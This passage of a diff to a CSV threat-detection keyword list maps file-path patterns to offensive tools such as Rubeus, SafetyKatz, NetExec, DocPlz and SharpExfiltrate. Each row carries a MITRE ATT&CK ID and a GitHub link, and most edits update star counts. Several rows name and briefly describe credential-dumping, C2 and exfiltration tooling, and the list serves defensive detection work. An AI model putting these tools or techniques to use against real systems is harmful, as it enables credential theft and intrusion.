tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" +"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" "*\rpcrt.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*\rpt_win.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" -"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*\RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*\runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\RunBOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\RunOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\RunOF\bin\*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*\SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*\samantha.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" -"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*\scanACLsResults.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*\scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\SCMUACBypass\*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" @@ -6383,19 +6511,21 @@ "*\ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*\ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*\ScriptSentry.txt*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" -"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*\servers\dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ShadowSpray\*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\SharpAzbelt.csproj*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.exe*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.sln*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" @@ -6405,8 +6535,8 @@ "*\SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*\SharpExfiltrate\*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*\SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - 